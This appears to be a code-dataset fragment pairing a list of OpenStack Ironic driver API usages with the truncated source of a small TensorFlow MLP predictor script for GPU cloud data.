{"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 122, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 122, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ssh.SSHManagement", "line_number": 123, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ssh", "line_number": 123, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ssh.ShellinaboxConsole", "line_number": 124, "usage_type": "call"}, {"api_name": 
"ironic.drivers.modules.ssh", "line_number": 124, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 127, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 127, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakePower", "line_number": 131, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 131, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.pxe.PXEBoot", "line_number": 132, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.pxe", "line_number": 132, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.agent.AgentDeploy", "line_number": 133, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.agent", "line_number": 133, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.agent.AgentRAID", "line_number": 134, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.agent", "line_number": 134, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 137, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 137, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 141, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 141, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 142, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 142, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 144, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.power.IloPower", "line_number": 145, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.power", "line_number": 145, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 146, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 146, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ilo.management.IloManagement", "line_number": 147, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.management", "line_number": 147, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ilo.inspect.IloInspect", "line_number": 148, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ilo.inspect", "line_number": 148, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 151, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 151, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 155, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 155, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 156, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 156, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 158, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.power.DracPower", "line_number": 160, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.power", "line_number": 160, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.deploy.DracDeploy", "line_number": 161, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.deploy", "line_number": 161, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.management.DracManagement", "line_number": 162, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.management", 
"line_number": 162, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.raid.DracRAID", "line_number": 163, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.raid", "line_number": 163, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.vendor_passthru.DracVendorPassthru", "line_number": 164, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.vendor_passthru", "line_number": 164, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.drac.inspect.DracInspect", "line_number": 165, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.drac.inspect", "line_number": 165, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 168, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 168, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 172, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 172, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 173, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 173, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 175, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.snmp.SNMPPower", "line_number": 176, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.snmp", "line_number": 176, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 177, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 177, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 180, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 180, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 184, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 184, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 185, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 185, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 187, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.power.IRMCPower", "line_number": 188, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.power", "line_number": 188, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 189, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 189, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.irmc.management.IRMCManagement", "line_number": 190, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.management", "line_number": 190, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.irmc.inspect.IRMCInspect", "line_number": 191, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.irmc.inspect", "line_number": 191, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 194, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 194, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIPower", "line_number": 198, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 198, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIShellinaboxConsole", "line_number": 199, "usage_type": "call"}, {"api_name": 
"ironic.drivers.modules.ipmitool", "line_number": 199, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 200, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 200, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.VendorPassthru", "line_number": 201, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 201, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ipmitool.IPMIManagement", "line_number": 202, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ipmitool", "line_number": 202, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.inspector.Inspector", "line_number": 206, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.inspector", "line_number": 206, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 209, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 209, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 213, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 213, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 214, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 214, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 216, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ucs.power.Power", "line_number": 217, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ucs.power", "line_number": 217, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 218, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 218, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.ucs.management.UcsManagement", "line_number": 219, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.ucs.management", "line_number": 219, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 222, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 222, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 226, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", "line_number": 226, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 227, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 227, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 229, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.cimc.power.Power", "line_number": 230, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.cimc.power", "line_number": 230, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 231, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 231, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.cimc.management.CIMCManagement", "line_number": 232, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.cimc.management", "line_number": 232, "usage_type": "name"}, {"api_name": "ironic.drivers.base.BaseDriver", "line_number": 235, "usage_type": "attribute"}, {"api_name": "ironic.drivers.base", "line_number": 235, "usage_type": "name"}, {"api_name": "oslo_utils.importutils.try_import", "line_number": 239, "usage_type": "call"}, {"api_name": "oslo_utils.importutils", 
"line_number": 239, "usage_type": "name"}, {"api_name": "ironic.common.exception.DriverLoadError", "line_number": 240, "usage_type": "call"}, {"api_name": "ironic.common.exception", "line_number": 240, "usage_type": "name"}, {"api_name": "ironic.common.i18n._", "line_number": 242, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.common.get_oneview_client", "line_number": 246, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.common", "line_number": 246, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.oneview.power.OneViewPower", "line_number": 249, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.power", "line_number": 249, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.oneview.management.OneViewManagement", "line_number": 250, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.oneview.management", "line_number": 250, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeBoot", "line_number": 251, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 251, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeDeploy", "line_number": 252, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 252, "usage_type": "name"}, {"api_name": "ironic.drivers.modules.fake.FakeInspect", "line_number": 253, "usage_type": "call"}, {"api_name": "ironic.drivers.modules.fake", "line_number": 253, "usage_type": "name"}]} +{"seq_id": "606749086", "text": "'''\nPredictor MLP model for gpu-cloud\n'''\n\nfrom __future__ import print_function\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nimport tensorflow as tf\nimport numpy as np\nimport csv\nimport random\ndef loadNormData(norm_file):\n\tret_vectors = []\n\twith open(norm_file,\"r\") as fp:\n\t\tvector_lines = fp.readlines()\n\t\tfor line in vector_lines:\n\t\t\tnorm_info = []\n\t\t\t\ndef unnormalizeData(vectors, norm_info):\n\tfor i in range(len(vectors[0])):\n\t\tmin_num = norm_info[i][0]\n\t\tmax_num = norm_info[i][1]\n\t\tif min_num != max_num:\n\t\t\tfor j in range(len(vectors)):\n\t\t\t\tvectors[j][i] = (max_num - min_num) * vectors[j][i] + min_num\n\ndef returnLog(vectors): \n\tnew_vectors = []\n\tfor i in range(len(vectors)):\n\t\tvector = []\n#\t\tfor j in range(len(vectors[0])):\n#\t\t\tvector.append(np.log)\n#\t\tprint(vector)\n\t\tnew_vectors.append(np.log(vectors[i]))\n\treturn new_vectors\ndef returnExp(vectors):\n\tnew_vectors = []\n\tfor i in range(len(vectors)):\n\t\t#vector = []\n\t\t#for j in range(len(vectors[0])):\n\t\t#vector.append(np.exp(vectors[i][j]))\n\t\tnew_vectors.append(np.exp(vectors[i]))\n\treturn new_vectors\n\n\t\t\ndef getRandBatch(data,label,batch_size):\n\ti=0\n\tdata_batch = []\n\tlabel_batch = []\n\tN = len(data)\n\twhile i